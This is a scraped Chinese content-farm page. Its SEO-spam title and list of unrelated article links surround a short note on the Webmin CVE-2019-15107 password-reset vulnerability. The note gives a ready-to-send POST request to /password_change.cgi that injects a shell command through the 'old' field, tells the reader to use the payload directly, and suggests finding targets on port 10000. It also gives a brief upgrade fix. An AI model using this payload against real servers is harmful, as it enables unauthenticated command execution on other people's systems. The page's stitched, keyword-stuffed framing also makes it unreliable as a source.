当前位置: 首页 > news >正文

毕业设计php做网站长沙网络推广

news 2025/7/18 14:14:36
毕业设计php做网站,长沙网络推广,网站建设行业衰落,wordpress仿站维护漏洞编号 CVE-2019-15107 漏洞描述 Webmin是一个基于Web的系统配置工具&#xff0c;用于类Unix系统。密码重置页面中存在此漏洞&#xff0c;允许未经身份验证的用户通过简单的 POST 请求执行任意命令。 影响版本 Webmin<1.920 漏洞评级 严重 利用方法&#xff08;利…

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可 

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

 

http://www.ds6.com.cn/news/34792.html

相关文章:

  • 无锡新吴区住房建设交通局网站郑州外语网站建站优化
  • 广西桂建云证件查询windows优化大师提供的
  • 潍坊个人做网站的公司seo报告
  • wordpress建站版本推荐品牌营销策划网站
  • angularjs网站开发实例来宾网站seo
  • 台州市网站建设网络营销有什么
  • 织梦后台怎么加自己做的网站seo引擎优化软件
  • 建设工程施工合同属于被逆冬seo课程欺骗了
  • 乙肝能治好吗优化大师电脑版官方免费下载
  • 写小说的小网站百度推广一天烧多少钱
  • 站酷设计网西安抖音seo
  • 肇庆网站制作费用seo推广经验
  • 可以做幻灯片的网站提高网站排名
  • 网站建设的团队分工seo关键词工具
  • 专业手机网站建设公司排名网络工程师培训机构排名
  • 龙岗网站维护百度首页 百度一下
  • 相册管理网站模板下载失败搜索网站大全排名
  • 现在企业做门户网站seo sem推广
  • 在建设厅网站上下载资质标准中国广告公司前十强
  • 长春网站建设优化排名谷歌外贸网站
  • 内网网站建设的亮点特点百度网站网址是多少
  • 网上怎么自己做网站seo点击排名软件哪家好
  • 公司官方网站一般什么公司做环球网最新消息
  • 商贸公司网站模板seo管理系统培训运营
  • 如何来做网站seo是什么职业
  • 大型网站开发互联网营销方式
  • 建立自己的网站需要服务器吗宁波seo推广推荐公司
  • 宣传册如何制作北京网站优化方案
  • 南昌网站搭建服务百度云app下载安装
  • 计算机网络技术网站建设方向制作网站的工具